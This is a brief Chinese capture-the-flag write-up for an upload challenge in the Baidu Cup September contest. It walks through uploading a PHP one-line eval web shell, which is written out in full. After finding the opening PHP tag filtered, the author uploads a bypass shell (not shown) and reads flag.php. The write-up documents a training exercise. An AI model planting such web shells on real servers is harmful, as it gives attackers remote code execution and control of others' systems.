i春秋“百度杯”CTF比赛 九月场 web题 upload
题目描述:想怎么传就怎么传,就是这么任性。tips:flag在flag.php中
打开题目发现
于是想到通过上传一句话木马进入后台
上传一句话木马
<?php eval($_POST['ant']);?>
提示上传成功,查看网页源代码提示
php文件上传到u/antsword.php中。于是直接访问发现代码变成
eval($_POST['ant']); ?>
<?php明显已经被过滤了,于是百度查找解决方法,发现有师傅提出
于是上传新马,成功挂马。
通过马访问flag.php
得到flag
参考链接https://zhidao.baidu.com/question/502391825291536924.html